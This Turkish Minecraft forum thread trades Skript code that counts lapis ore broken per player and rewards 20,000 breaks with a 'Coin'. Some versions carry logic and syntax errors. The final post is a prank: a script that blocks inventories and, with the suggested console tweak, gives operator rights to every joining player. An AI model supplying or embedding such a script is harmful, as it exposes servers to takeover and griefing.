on break lapis ore:
if {lapis.%player%} smaller than 20000:
add 1 {lapis.%player%}
if {lapis.%player%} greater than 19999:
add 1 {lapis.%player%}
delete {lapis.%player%}
give 1 gold nugget named "&6Coin" to player
command /bak:
trigger:
if {lapis.%player%} is not set:
send "&4Üzgünüm, daha 20000 lapis kırman gerekiyor."
if {lapis.%player%} is set:
send "&aKırılan lapis: &b{lapis.%player%}"
on break of lapis ore:
if {lapissayisi.%player%} is not set:
set {lapissayisi.%player%} to 0
add 1 to {lapissayisi.%player%}
if {lapissayisi.%player%} greater or equal to 20000:
give 1 of gold nugget with name "&6Coin" to player
command /bak:
trigger:
if {lapissayisi.%player%} is not set:
set {lapissayisi.%player%} to 0
send "&cKırdığın Lapis Sayısı: &e%{lapissayisi.%player}%"
Bilgiseyara geçince deneyeceğim teşekkürlerKod:on break of lapis ore: if {lapissayisi.%player%} is not set: set {lapissayisi.%player%} to 0 add 1 to {lapissayisi.%player%} if {lapissayisi.%player%} greater or equal to 20000: give 1 of gold nugget with name "&6Coin" to player command /bak: trigger: if {lapissayisi.%player%} is not set: set {lapissayisi.%player%} to 0 send "&cKırdığın Lapis Sayısı: &e%{lapissayisi.%player}%"
on break lapis ore:
if {lapis.%player%} is not set:
add 1 to {lapis.%player%}
if {lapis.%player%} is smaller than 20000:
add 1 to {lapis.%player%}
if {lapis.%player%} is greater than 19999:
add 1 to {lapis.%player%}
delete {lapis.%player%}
give 1 gold nugget named "&6Coin" to player
command /bak:
trigger:
if {lapis.%player%} is not set:
send "&4Üzgünüm, daha 20000 lapis kırman gerekiyor."
if {lapis.%player%} is set:
send "&aKırılan lapis: &b%{lapis.%player%}%"
TeşekkürlerDenenmiş hali. Hiçbir sorun yok.Kod:on break lapis ore: if {lapis.%player%} is not set: add 1 to {lapis.%player%} if {lapis.%player%} is smaller than 20000: add 1 to {lapis.%player%} if {lapis.%player%} is greater than 19999: add 1 to {lapis.%player%} delete {lapis.%player%} give 1 gold nugget named "&6Coin" to player command /bak: trigger: if {lapis.%player%} is not set: send "&4Üzgünüm, daha 20000 lapis kırman gerekiyor." if {lapis.%player%} is set: send "&aKırılan lapis: &b%{lapis.%player%}%"
execute player yerini execute console yaparsan çalışacaktıral bakalım
sakın yapma ha.Kod:on inventory open: cancel event send "nabıon" on join: set player's gamemode to creative make execute player command "/op %player%"